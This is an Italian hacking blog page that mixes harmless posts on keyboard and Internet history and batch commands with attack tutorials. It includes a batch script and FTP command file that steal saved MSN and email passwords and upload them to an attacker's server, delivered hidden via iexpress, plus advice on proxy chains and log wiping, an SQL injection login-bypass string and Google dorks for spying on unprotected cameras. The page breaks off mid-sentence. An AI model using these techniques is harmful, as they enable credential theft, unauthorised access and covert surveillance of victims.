DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

QWERTY... Ancora Storia!


La tastiera si presenta come una serie ordinata di tasti la cui pressione permette l'inserimento, nella memoria del computer, di un particolare carattere, oppure l'esecuzione di un particolare comando da parte del computer. A tal fine, su ogni tasto, è presente una serigrafia che ricorda all'utente a quale carattere o comando corrisponde il tasto.
Nell'implementazione odierna più comune, la maggior parte dei tasti consente l'inserimento di due o anche tre caratteri diversi, raramente invece di due o tre comandi diversi. Normalmente un carattere/comando è ottenuto mediante la semplice pressione del tasto, gli altri caratteri/comandi del medesimo tasto attraverso la pressione contemporanea di un particolare tasto funzione.
Sostanzialmente la tastiera si distingue nelle due seguenti tipologie:
  • tastiera numerica;
  • tastiera alfanumerica.
La tastiera numerica permette solo l'inserimento di numeri e l'esecuzioni di comandi, mentre quella alfanumerica anche l'inserimento di caratteri alfabetici. Attualmente la tastiera di norma è una tastiera alfanumerica. Le prime tastiere, quando ancora i computer erano in grado elaborare solo numeri, erano invece numeriche. Oggi la tastiera numerica si può trovare ancora in computer special purpose.

Per l'utilizzo efficiente e veloce della tastiera alfanumerica esiste una tecnica, la dattilografia, nata con la macchina per scrivere. Nella maggior parte dei casi la tastiera alfanumerica ha mutuato infatti la disposizione dei tasti da tale dispositivo.
La tastiere alfanumerica normalmente è nazionalizzata in quanto ogni nazione utilizza una propria lingua con un set di caratteri alfabetico diverso, ragion dovuta alla diversa condizione lessico-grafica di ogni lingua: si tende a ravvicinare lettere che spesso vanno insieme: in italiano la A si accompagna spesso con S, D, C, ecco perché si trovano vicine (cfr figura) . Ma il posizionamento e il numero di tasti varia oltre che da Paese a Paese, anche in base al modello di computer. Ad esempio le tastiera per personal computer portatili hanno varie differenze da quelle per personal computer desktop in quanto limitate da spazi minori.
Esistono vari schemi per tastiera alfanumerica. Il più comune è denominato QWERTY, ma ne esistono anche altri come ad esempio il GKOS, QZERTY e il Dvorak.

QWERTY (pronuncia /'kwerti/) è oggi il più comune schema per tastiere alfanumeriche, utilizzato nella maggior parte delle tastiere per computer ma anche nelle macchine per scrivere. È utilizzato anche nella maggior parte delle tastiere alfanumeriche italiane.
Il nome "QWERTY" deriva dalla sequenza delle lettere dei primi sei tasti della riga superiore della tastiera. Lo schema QWERTY fu brevettato nel 1864 da Christopher Sholes e venduto alla Remington and Sons nel 1873, quando cominciò a comparire sulle macchine per scrivere.
Nella tastiera QWERTY le coppie di lettere maggiormente utilizzate sono separate, nel tentativo di evitare che i martelletti delle macchine per scrivere si storcessero e incastrassero, costringendo chi scriveva a sbloccare manualmente i martelletti, spesso macchiando il documento. Si ritiene che la riga centrale dello schema QWERTY (ASDFGHJKL) sia un residuo del vecchio schema alfabetico che fu sostituito dal QWERTY. Lo schema QWERTY tenta anche di dividere i tasti tra le due mani, in modo tale che mentre una mano si posiziona, l'altra mano colpisce il tasto. Questo accelerò la scrittura rispetto ai metodi precedentemente usati.
I tasti corrispondenti alla F e alla J presentano solitamente una barretta orizzontale, o altro elemento in rilievo atto ad essere percepito col tatto: così tutti gli altri tasti possono essere raggiunti mnemonicamente ponendo gli indici su questi e le altre dita sugli altri tasti secondo la normale posizione per dattilografare.
La tastiera italiana non è riuscita, a differenza di altre lingue in cui i segni diacritici in uso sono più di quelli italiani, ad adattarsi alla lingua italiana pienamente. Probabilmente per emulazione della tastiera francese, mancano totalmente le vocali maiuscole accentate. Se in francese la lettera maiuscola non accentata è tollerata, in italiano, come in spagnolo, no. La tastiera spagnola, infatti, è in grado di porre l'accento anche sulle lettere maiuscole. 
Risulta invece più adatta allo scopo la Tastiera Internazionale (talvolta identificata come Tastiera Americana) la quale, sebbene del tutto priva di tasti atti ad inserire direttamente lettere accentate, genera agevolmente lettere, sia maiuscole che minuscole, con vari tipi di accento o dieresi utilizzando i cosiddetti tasti morti.
Allo scopo si deve digitare l'accento (o altro simbolo) prima della lettera da inserire: digitando l'accento non apparirà nulla (da cui la definizione di tasto morto), ma, alla successiva pressione di una lettera valida, apparirà quest'ultima opportunamente accentata. Ad esempio ' + E darà É, mentre ~ + N darà Ñ.
Digitando un accento seguito da una lettera alla quale non possa essere applicato verranno inseriti i due simboli nell'ordine digitato: ' + h darà solo 'h, non esistendo h accentata.
Dato che la definizione del tipo di layout è nel software, non nell'hardware della tastiera (salvo alcune variazioni posizionali di pochissimi tasti, le tastiere sono tutte pressoché identiche, ed a variare è la sola serigrafia sui tasti), la procedura può variare leggermente in base al sistema operativo od al software in uso.
Ad esempio la procedura d'inserimento del solo accento (o altro simbolo) è variabile col sistema operativo utilizzato: se con Windows si usa premere uno spazio dopo l'accento (spazio che non verrà inserito nel testo) con Linux si usa digitare l'accento due volte consecutive, cosa che in Windows avrebbe fatto comparire due accenti.

BY WIKIPEDIA

Nascita Internet.. Storia!


Il progenitore e precursore della rete Internet è considerato il progetto ARPANET, finanziato dalla Defence Advanced Research Projects Agency (inglese: DARPA, Agenzia per i Progetti di ricerca di Difesa Avanzata), una agenzia dipendente dal Ministero della Difesa statunitense (Department of Defense o DoD degli Stati Uniti d'America). In una nota del 25 aprile 1963, Joseph C.R. Licklider aveva espresso l'intenzione di collegare tutti i computer e i sistemi di time-sharing in una rete continentale. Avendo lasciato l'ARPA per un posto all'IBM l'anno seguente, furono i suoi successori che si dedicarono al progetto ARPANET.
Il contratto fu assegnato all'azienda da cui proveniva Licklider, la Bolt, Beranek and Newman (BBN) che utilizzò i minicomputer di Honeywell come supporto. La rete venne fisicamente costruita nel 1969 collegando quattro nodi: l'Università della California di Los Angeles, l'SRI di Stanford, l'Università della California di Santa Barbara, e l'Università dello Utah. L'ampiezza di banda era di 50 Kbps. Negli incontri per definire le caratteristiche della rete, vennero introdotti i fondamentali Request for Comments, tuttora i documenti fondamentali per tutto ciò che riguarda i protocolli informatici della rete. La super-rete dei giorni nostri è risultata dall'estensione di questa prima rete, creata sotto il nome di ARPANET.
I primi nodi si basavano su un'architettura client/server, e non supportavano quindi connessioni dirette (host-to-host). Le applicazioni eseguite erano fondamentalmente Telnet e i programmi di File Transfer Protocol (FTP). La posta elettronica fu inventata da Ray Tomlinson della BBN nel 1971, derivando il programma da altri due: il SENDMSG per messaggi interni e CPYNET, un programma per il trasferimento dei file. L'anno seguente Arpanet venne presentata al pubblico, e Tomlinson adattò il suo programma per funzionarvi: divenne subito popolare, grazie anche al contributo di Larry Roberts che aveva sviluppato il primo programma per la gestione della posta elettronica, RD.

Internet è una rete di computer mondiale ad accesso pubblico attualmente rappresentante anche uno dei principali mezzi di comunicazione di massa. Chiunque infatti disponga di un computer e degli opportuni software, appoggiandosi a un Internet service provider che gli fornisce un accesso a Internet attraverso una linea di telecomunicazione dedicata (ADSL, HDSL, VDSL, GPRS, HSDPA, ecc.) o una linea telefonica della Rete Telefonica Generale (POTS, ISDN, GSM, UMTS, ecc.), può accedere a Internet ed utilizzare i suoi servizi. Ciò è reso possibile da una suite di protocolli di rete chiamata "TCP/IP" dal nome dei due principali, il TCP e l'IP, la "lingua" comune con cui i computer di Internet si interconnettono e comunicano tra loro indipendentemente dalla loro architettura hardware e software.
Costituita da alcune centinaia di milioni di computer collegati tra loro con i più svariati mezzi trasmissivi, Internet è anche la più grande rete di computer attualmente esistente, motivo per cui è definita "rete delle reti" o "rete globale". In quanto rete di telecomunicazione (una rete di computer è una tipologia di rete di telecomunicazione) è invece seconda alla Rete Telefonica Generale, anch'essa mondiale e ad accesso pubblico ma coprente il pianeta in modo più capillare di Internet, motivo per cui inizialmente è stata largamente utilizzata per l'accesso a Internet degli utenti comuni, e tutt'oggi lo è ancora, anche se, in un futuro non troppo lontano, con il miglioramento della tecnologia VoIP, è destinata a scomparire inglobata dalla stessa Internet in quanto basata sulla più efficiente tecnica della commutazione di pacchetto.
Internet offre i più svariati servizi, i principali dei quali sono il World Wide Web e la posta elettronica, ed è utilizzata per le comunicazioni più disparate: private e pubbliche, lavorative e ricreative, scientifiche e commerciali. I suoi utenti, in costante crescita, nel 2008 hanno raggiunto quota 1,5 miliardi e, visto l'attuale ritmo di crescita, si prevede che saliranno a 2,2 miliardi nel 2013.[2]
La prima pubblicazione in cui si teorizza una rete di computer mondiale ad accesso pubblico è On-line man computer communication dell'agosto 1962, pubblicazione scientifica degli statunitensi Joseph C.R. Licklider e Welden E. Clark. Nella pubblicazione Licklider e Clark, ricercatori del Massachusetts Institute of Technology, danno anche un nome alla rete da loro teorizzata: "Intergalactic Computer Network". Ma prima che tutto ciò diventi una realtà è necessario attendere fino al 1991 quando il governo degli Stati Uniti d'America emana la High performance computing act, la legge con cui per la prima volta viene prevista la possibilità di ampliare, ad opera dell'iniziativa privata e con finalità di sfruttamento commerciale, una Internet fino a quel momento rete di computer mondiale di proprietà statale e destinata al mondo scientifico. Sfruttamento commerciale che subito viene messo in atto anche dagli altri Paesi. Nel 1993 il CERN, l'istituzione europea dove nasce il World Wide Web, decide di rendere pubblica la tecnologia alla base del World Wide Web in modo che sia liberamente implementabile da chiunque. A questa decisione fa seguito un immediato e ampio successo del World Wide Web in ragione delle funzionalità offerte, della sua efficienza e, non ultima, della sua facilità di utilizzo. Da tale successo ha inizio la crescita esponenziale di Internet che in pochissimi anni porterà la rete delle reti a cambiare per sempre la società umana rivoluzionando il modo di relazionarsi delle persone come quello di lavorare tanto che nel 1998 si arriverà a parlare di "nuova economia".

Nascita del World Wide Web (1991)

Nel 1991 presso il CERN di Ginevra il ricercatore Tim Berners-Lee definì il protocollo HTTP (HyperText Transfer Protocol), un sistema che permette una lettura ipertestuale, non-sequenziale dei documenti, saltando da un punto all'altro mediante l'utilizzo di rimandi (link o, più propriamente, hyperlink). Il primo browser con caratteristiche simili a quelle attuali, il Mosaic, venne realizzato nel 1993. Esso rivoluzionò profondamente il modo di effettuare le ricerche e di comunicare in rete. Nacque così il World Wide Web.
Nel World Wide Web (WWW), le risorse disponibili sono organizzate secondo un sistema di librerie, o pagine, a cui si può accedere utilizzando appositi programmi detti browser con cui è possibile navigare visualizzando file, testi, ipertesti, suoni, immagini, animazioni, filmati.
La facilità d'utilizzo connessa con l'HTTP e i browser, in coincidenza con una vasta diffusione di computer per uso anche personale (vedi Storia del Personal Computer), hanno aperto l'uso di Internet ad una massa di milioni di persone, anche al di fuori dell'ambito strettamente informatico, con una crescita in progressione esponenziale.

Elenco comandi batch


Ecco per voi l elenco di TUTTI i comandi batch:

* assign – reindirizza tutte le richieste a un drive, verso un altro drive
* attrib – visualizza o modifica gli attributi dei file
* backup – crea una copia di sicurezza di uno o più file su una serie di floppy-disk
* break – abilita o disabilita l’interruzione o l’esecuzione fornita da CTRL C e CTRL BREAK
* cd – lett. change directory, entra in una directory. Sintassi: “cd\” per entrare in C, e “cdpercorso directory” per entrare in altra cartella.
* chdir – cambia la directory corrente o ne visualizza il nome
* chkdsk – analizza il contenuto del disco e visualizza una relazione sul suo stato
* cls – cancella il contenuto della schermata (questo comando non è distruttivo)
* cmd – lett. command DOS, apre la schermata per i comandi da DOS
* color – permette di impostare il colore dello sfondo e del testo
* command – avvia un nuovo interprete dei comandi MS-DOS
* comp – confronta il contenuto di un file o gruppo di file con altri
* copy – copia uno o più file in un altro punto del disco
* ctty – cambia la console di input/output da cui vengono impostati i comandi
* date – visualizza e permette di aggiornare la data
* defrag – riorganizza i file in un disco rigido per ottimizzarne l’uso
* del – cancella uno o più file
* deltree – elimina una directory e tutti i file e le sottodirectory in essa contenute
* dir – visualizza il contenuto di una directory
* dir *.* txt.list – crea in DOS un elenco dei nomi-file presenti nella directory
* discopy – copia il contenuto di un disco floppy in un altro disco floppy
* diskcomp – confronta il contenuto di due dischetti dello stesso tipo
* diskmgmt.msc – indica la lettera assegnata a un’unità di rete. Può essere modificata con una lettera libera perchè il PC rilevi la periferica
* doskey – ripete gli ultimi comandi digitati
* echo – abilita o disabilita l’eco da file batch
* edit – avvia MS-DOS Editor per creare o modificare i file ASCII
* edlin – avvia un editor di righe di testo. Per magg. informazioni (Prompt comandi e edlin/?)
* emm386 – abilita o disabilita la memoria espansa di EMM386
* erase – cancella uno o piu file specificati
* exe2bin – converte in formato binario un file eseguibile
* exit – provoca l’uscita da un interprete di comandi secondario per ritornare ad un interprete di comandi o ad un programma precedenti
* expand – decomprime uno o più file compressi
* fastopen – accelera l’apertura di un programma
* fc – confronta il contenuto di due file
* fdisk – configura un disco rigido creando le partizioni, per l’utilizzo di MS-DOS
* find – ricerca una sequenza di caratteri all’interno di uno o piu file
* for – permette di eseguire in modo iterattivo comandi di MS-DOS
* format – formatta un disco per l’utilizzo di MS-DOS
* goto – trasferisce l’esecuzione ad una determinata posizione di un file batch
* graftabl – carica in memoria i caratteri ASCII non BIOS per i modi grafici
* help – visualizza la guida di MS-DOS. ATTENZIONE la guida è troppo lunga per essere visualizzata in una sola schermata, quindi per visualizzarla schermata per schermata digitare help|more (il simbolo “|” è il tasto alla sinistra tasto uno (1) altrimenti alt+124 = “|” e scrivere more
* hexdump – lista in formato esadecimale il contenuto di un file, byte per byte
* if – condiziona l’esecuzione di un comando in un file batch
* ipconfig – visualizza la configurazione IP di Windows. ATTENZIONE per maggiori informazioni digitare ipconfig/all
* join – unisce un drive di disk ad una directory vuota su di un altro drive
* keyb – configura la tastiera per la lingua specificata
* label – crea, modifica o elimina l’etichetta di volume di un disco
* md – crea una directory
* mem – visualizza la quantità della memoria usata e quella libera del sistema
* mode – stabilisce le modalità di visualizzazione e trasmissione per la stampante
* more – permette la visualizzazione di informazioni, (files, pagine, o altri tipi di dati) che per la loro grandezza (insieme di righe) devono essere visualizzate con più schermate alla volta. ATTENZIONE è necessario che “more” sia preceduto dal simbolo “|” ALT+124. Ex. help|more. Prestare ulteriore ATTENZIONE in alcuni computers o Sistemi operativi anteriori al MS-DOS 6.0 non riconoscono il simbolo “|” è, perciò, necessario digitare il simbolo “/” seguito da una p. Ex. help/p
* path – visualizza o imposta un percorso di ricerca per file eseguibili
* pause – provoca una pausa nell’esecuzione di un file batch per consentire un input da operatore
* print – stampa un file di testo
* prompt – cambia il prompt dei comandi di MS-DOS
* rd – cancella una directory
* recover – recupera un file o un intero disco con settori danneggiati
* rem – visualizza commenti durante l’esecuzione di un file batch
* ren – rinomina uno o più file
* replace – sostituisce i file
* restore – ripristina dai dischi di back-up un certo numero di file
* rmdir – rimuove una sottodirectory vuota
* select – copia il dischetto MS-DOS per creare una copia di lavoro per la nazionalità selezionata della tastiera
* set – assegna un valore di sostituzione ad un parametro con chiave presente in un programma applicativo o in un file batch
* share – installa la condivisione ed il bloccaggo dei file MS-NET
* shift – aumenta il numero di parametri sostituibili in un file batch
* shutdown – arresta o riavvia il sistema
* sort – ordina i dati alfabeticamente, in un senso o nell’altro
* subst – associa un percorso ad una lettera di unità
* sys – copia i file di sistema di MS-DOS e l’interprete dei comandi sul disco specificato
* time – visualizza e consente di modificare l’ora
* title – permette di impostare il titolo della finestra
* tree – visualizza tutte le directory ed i percorsi del drive specificato
* type – visualizza il contenuto di un file di testo
* undelete – ripristina i file cancellati precedentemente con il comando del
* unformat – ripristina i dati di un disco cancellati con il comando format
* ver – visualizza la versione di MS-DOS in uso
* verify – abilita la verifica dei dati in scrittura
* vol – visualizza l’etichetta e il numero di serie di volume del disco
* win – esegue Windows
* xcopy – copia i file e la struttura delle directory (ad esclusione dei file nascosti e di sistema)
* /a – mostra l’output nella schermata DOS
* /a > – salva l’output in un file di testo “prova” nella directory corrente
* /s – esegue il comando anche nei file presenti in tutt

Fregare pass msn da remoto


Chi si ricorda dei programmini “MessePass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB?

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate memorizzate su una macchina.
Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di:
1) Uno spazio web
2) Il programma “MessenPass”
3) Il programma “MailPassView”
4) Il file eseguibile di WinRar
5) Un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Il codice del file start.bat:
Aprite il blocco note e scriveteci dentro il seguente codice e rinominate con estenzione .bat

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l'output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l'output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea


Il contenuto del file ftp.txt:
open tuositoftp.org //l'host dello spazio web
tuouserftp //l'username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye
//chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.
Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente il codice contiene degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.
Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.
Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:
Non memorizzate le password sul vostro computer ma riscrivetele ogni volta;
Se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni! 

Introduzione breve ai Batch

In informatica, e in particolare nella terminologia di MS-DOS e Windows, un file batch o comando batch è un file di testo che contiene una sequenza di comandi per l’interprete di comandi del sistema (solitamente command.com o cmd.exe). Il file batch viene eseguito dall’interprete dei comandi mandando in esecuzione, secondo la sequenza specificata, i comandi elencati nel file. Il concetto di file batch è analogo a quello di shell script per i sistemi Unix e infatti può essere considerato un rudimentale linguaggio di scripting, anche se i costrutti a disposizione sono veramente pochi: if, for e goto.
I comandi batch di MS-DOS devono avere estensione .bat per essere riconosciuti come tali dal sistema operativo mentre i sistemi NT (Windows NT/2000/XP e successivi) accettano anche l’estensione .cmd.
Il file batch forse più famoso è Autoexec.bat perché veniva eseguito automaticamente all’avvio di tutti i sistemi operativi basati su MS-DOS.
I comandi utilizzabili sono tutti quelli disponibili per il prompt di sistema e si dividono in due categorie:

  • comandi interni (come cd per cambiare la cartella di lavoro o dir per elencarne il contenuto)

  • comandi esterni (come format o chkdsk)
Il termine batch risale all’epoca della programmazione per schede perforate. In quel contesto, i programmatori solitamente non avevano accesso diretto al computer, bensì preparavano i propri programmioff-line” e li passavano a un amministratore di sistema, il quale aveva il compito di mandarli in esecuzione quando possibile (accodandoli rispetto ad altri programmi in esecuzione e spesso accorpando più programmi in un’unica unità di esecuzione), restituendo poi in seguito i risultati dell’elaborazione agli interessati.
Quando il sistema informativo era organizzato in modo da non prevedere l’uso di terminali direttamente collegati con l’elaboratore centrale, l’unico modo che consentiva di ottenere i servizi del Centro di Calcolo era quello di inviare al Centro stesso i documenti cartacei per l’elaborazione e poi di ricevere i risultati.
In una situazione di questo tipo, detta batch processing, i dati contenuti nei documenti dovevano essere dapprima codificati, registrati su supporti compatibili con l’elaboratore, verificati con una operazione detta data entry e quindi avviati all’elaborazione.
Vale la pena di osservare a questo proposito che, in presenza di errori, cresceva notevolmente il tempo di risposta; infatti il CED era costretto a consultare l’utente, il quale a sua volta doveva compiere nuovamente l’analisi dei propri dati e, alla fine, far pervenire agli addetti del Centro di Calcolo le correzioni da apportare.
Di conseguenza, il colloquio tra Centro di Calcolo e i propri utenti spesso doveva prevedere, oltre alle fasi di ricezione dei dati e di invio della risposta, anche una serie di passi intermedi legati alla comunicazione degli errori riscontrati o alla richiesta di chiarimenti.
Eccone un esempio:
Hello World! – Stampa a monitor la scritta “Hello World!” ed esce:
@echo Hello World!

Ora possiamo cominciare…
1) Come si lancia il il prompt dei comandi (o cmd)?
È molto facile lanciarlo,basta andare su START > ESEGUI > DIGITARE cmd > e premere INVIO.
oppure semplicemente andare su START > PROGRAMMI > ACCESSORI > e cliccare su PROMPT DE COMANDI.

2)Cosa posso fare una volta dentro ?
Per rispondere a questa domanda ho elencato qui di seguito una lista di nomi dei comandi:
CITAZIONE
ATTRIB Visualizza o modifica gli attributi dei file.
CD Cambia la directory corrente o ne visualizza il nome.
CHDIR Cambia la directory corrente o ne visualizza il nome.
CHKDSK Verifica il disco e visualizza una relazione sul suo stato.
CLS Cancella il contenuto della schermata.
COMMAND Avvia un nuovo inteprete dei comandi MS-DOS.
COPY Copia uno o piu’ file in un altro punto del disco. DEFRAG Riorganizza i file su un disco per ottimizzarne l’uso.
DEL Elimina uno o piu’ file.
DELTREE Elimina una directory e tutti i file e le sottodirectory in essa contenuti.
DIR Visualizza l’elenco dei file e delle subdirectory di una directory.
DISKCOPY Copia il contenuto di un disco floppy in un altro disco floppy.
DOSKEY Modifica righe di comando, chiama comandi di MS-DOS e crea macro.
EDIT Avvia MS-DOS Editor per creare e modificare i file ASCII.
EMM386 Abilita o disabilita la memoria espansa di EMM386.
EXPAND Decomprime uno o piu’ file compressi.
FDISK Configura un disco rigido per l’utilizzo con MS-DOS.
FORMAT Formatta un disco per l’utilizzo con MS-DOS.
KEYB Configura la tastiera per la lingua specificata.
LABEL Crea, modifica o elimina l’etichetta di volume di un disco.
MD Crea una nuova directory.
MEM Visualizza la quantità di memoria usata e libera del sistema.
MKDIR Crea una nuova directory.
MORE Visualizza i dati di output una schermata per volta.
PATH Visualizza o imposta un percorso di ricerca per i file eseguibili.
PRINT Stampa un file di testo consentendo di usare altri comandi di MSDOS.
PROMPT Cambia il prompt dei comandi di MS-DOS.
RD Rimuove una directory.
REN Rinomina uno o piu’ file.
RENAME Rinomina uno o piu’ file.
REPLACE Sostituisce i file.
RMDIR Rimuove una directory.
SUBST Associa un percorso ad una lettera di unità.
SYS Copia i file di sistema di MS-DOS e l’inteprete dei comandi sul disco specificato.
TYPE Visualizza il contenuto di un file di testo.
UNDELETE Ripristina i file cancellati precedentemente con il comando DEL.
UNFORMAT Ripristina i dati di un disco cancellati con il comando FORMAT.
VER Visualizza la versione di MS-DOS in uso.
VOL Visualizza l’etichetta e il numero di serie di volume del disco.
XCOPY Copia i file (ad esclusione dei file nascosti e di sistema) e la struttura delle directory.

Prepariamoci ad Attaccare!


In questo post vedremo come prepararci se volessimo sferrare un qualunque tipo di attacco, che sia a un computer, a un sito, a un server ecc...

Per effettuare un attacco è necessario adottare alcuni piccoli, ma molto utili accorgimenti, soprattutto si deve evitare che la vittima possa risalire alla fonte dell’attacco, i motivi sono abbastanza ovvi, uno dei quali è quello di non ritrovarsi la Guardia di Finanza sotto casa, o la Polizia Postale. xD

E’ bene precisare che l’anonimato totale non esiste, ma possiamo ricorrere a degli “strumenti” che ci assicurano un grado di anonimizzazione pari al 95%.

Il nostro “tallone d’Achille” è l’indirizzo IP (si esatto, proprio l Internet Protocol, quei fantastici numerini separati da punti, che solo noi abbiamo, un po come un numero di telefono, ce ne uno assegnato a una persona, e non possono esistere due IP uguali) che il nostro ISP(Fornitore della Connessione) assegna in modo univoco alla nostra macchina una volta connessi alla rete internet.
Attaccare una qualsiasi applicazione web senza alcuna “maschera” è da veri e propri sprovveduti, (e grandi imbecilli, cioe, lo capite anche voi... E' come fare una rapina in banca e lasciare nome, cognome, e numero di telefono xD) è quindi "d’obbligo" utilizzare dei “filtri” che fanno da tramite tra noi e la vittima, in modo tale che quando la vittima tenta di risalire all’attaccante, ritroverebbe solamente l’indirizzo IP del “filtro”.

PROXY
I proxy sono server di appoggio che permettono agli utilizzatori di collegarsi a loro per poter navigare senza che il proprio indirizzo IP venga loggato.
Se ad esempio un utente volesse navigare sul sito di www.google.it in modo anonimo dovrebbe digitare http://ip-del-proxy.www.google.it:80, dove ip-del-proxy sta per l’indirizzo del server anonimo, e 80 sta per il numero della porta utilizzata da tale server proxy, in questo modo il browser dell’utente fa richiesta al proxy di reperire per suo conto le pagine di google.
Esiste una possibilità di una concatenazione di proxy per una maggiore sicurezza, cioè utilizzare due o più proxy di seguito, ad esempio:

ATTACCANTE -> PROXY1 -> PROXY 2 -> PROXY 3 -> VITTIMA

In questo modo il browser comunicherà con il primo proxy che farà richiesta al secondo che successivamente farà richiesta al terzo che si collegherà alla vittima.
La sicurezza è notevolmente aumentata perchè anche se la vittima riuscisse a farsi rivelare l’IP dal 3^ proxy server, avremmo gli altri due a nascoderci, da sottolineare che però in questo modo si ha un calo di velocità inverosimile!

SOCKS
I socks sono dei particolari protocolli che permettono la navigazione anonima utilizzando un firewall interno, la porta di default utilizzata è la numero 1080.
Praticamente il socks non fa altro che far direzionare l’attacco dal firewall, facendo in modo che alla vittima non appaia l’IP.
La vittima cercando l’IP dell’attaccante incontra il socks che trasferisce tutto al firewall.

WINGATE
I wingate consentono una navigazione anonimizzata utilizzando la porta 23, quindi è palese che possiamo utilizzarli per nascoderci quando effettuiamo i nostri attacchi via telnet, protocollo che utilizza proprio la porta 23.
E’ prassi che l’attaccante ad attacco ultimato modifichi i file log sul server vittima per confondere le tracce e elimini i dati di navigazione anche dal proprio PC.
In rete esistono centinaia di portali che pubblicano liste contenenti indirizzi di server proxy, socks e wingate anonimi, dovete però testarli prima di utilizzarli, per accertarvi che siano veramente anonimi.

Introduzione alla SQL Injection


Ecco una tecnica usata per appropriarsi di siti senza conoscere user e pswd, la SQL INJECTION non è che un’iniezione di codice "malevolo" in un database di tipo MySQL, tramite un attacco di questo tipo, e con stringhe ben pensate è abbastanza facile avere l’accesso non autorizzato con pieni poteri Admin su un’applicazione web che ricordo, supporta il database di tipo MySQL.

Prendiamo ad esempio una qualsiasi pagina di login, è strutturata da 2 campi:
1) Campo dell' Username (o login, nome, ecc)
2) Password
Se nel campo “userid” si immette il valore Admin e nel campo “password il valore passprova, la nostra query SQL sarà:

SELECT * tabella_utenti

WHERE userid = 'Admin'
AND password = 'passprova'


Questo codice è esatto ma non offre la sicurezza necessaria. Proviamo quindi a inserire una stringa ben strutturata, stiamo attenti alla posizione degli apici, ad esempio nel campo “password” andiamo ad inserire:

1' or '1' = '1

La query risultante è la seguente:

SELECT * FROM tabella_utenti
WHERE userid = 'Admin'
AND password = '1' OR '1' = '1'

Guardiamo cosa è successo: La query SQL grazie all’operatore OR imporrà ‘1′ = ‘1′, dato che l’uguaglianza si è verificata ecco che abbiamo l’accesso al pannello amministrativo dell’applicazione web senza conoscere userid e password.

Spiare Webcam con Google!

 
Esistono delle telecamere ad uso di sorveglianza e vengono
installate in mezzo alle strade o negli uffici per controllare
che non ci siano "traffici irregolari" o semplicemente per le
previsioni meterologiche.

Queste telecamere vengono monitorate da un personale specializzato
tramite un collegamento alla rete LAN e la proiezione del contenuto
di esse con visualizzazione per mezzo di hosts che spesso fan parte
dei sottodomini dei comuni dove sono state installate le telecamere,
o comunque dei siti che le utilizzano.

In questo minitutorial vedremo come le telecamere Toshiba 1K- WB11A
non hanno alcuna protezione e possono essere spiate come se niente fosse.

Per trovare queste telecamere basta utilizzare una stringa di Google
Hacking che permette di cercare tutti i siti dove è presente il file
dal quale si visualizzano i contenuti della telecamera stessa.

La stringa è la seguente:

allinurl:”user_view_S.htm”

Altre telecamere che non hanno protezioni sono la AXIS 2130R PTZ Network
Camera, alcune SONY, le ALIXIS e altri modelli che ora non vi sto ad
elencare, e per visualizzare i contenuti delle stesse, basta digitare
le seguenti stringhe di Google Hacking:

allinurl:"user_view_s.htm"
allinurl:”ViewerFrame?Mode=”
allinurl:"axis-cgi"

Invece un archivio di telecamere sprotette e ben classificate in base ai
posti in cui si trovano, è presente sul sito di http://www.camhacker.com/

BUG ed Exploits


Vediamo adesso cosa sono i bug, e come utilizzari con gli exploit:

COS' E' IL "BUG"?
Allora la parola "bug" va ad indicare un errore di scrittura nel codice sorgente di un software odi un sito web...a volte i "bug" non sono errori a livello sintattico perchè anche se non resi visibili o magari anche se non generano nessun problema al software o al sito web possono esserci comunque.
E quando ci sono possono essere sfruttati dagli "exploit", ma non sempre, spesso basta un po di ingegno e di
esperienza nel mondo dell'hacking e della programmazione.

COS' E' L' "EXPLOIT"?
Per quanto riguarda la parola "exploit" possiamo dire che è un programma ( di cui nei siti per scaricarli troviamo quasi sempre il sorgente e mai il programma già eseguibile ) che serve appunto per s fruttare un bug o una vulnerabilità di un server o di un sito.
Gli "exploit" possono essere scritti in diversi linguaggi come ma i più diffusi sono quelli in C, PERL e PHP.
Un noto sito per scaricare exploit è www.milw0rm.com.

L' USO DEGLI "EXPLOITS" NEI VARI LINGUAGGI.
Se non conoscete i linguaggi di programmazione di cui parleremo a seguire, sicuramente vi chiederete:
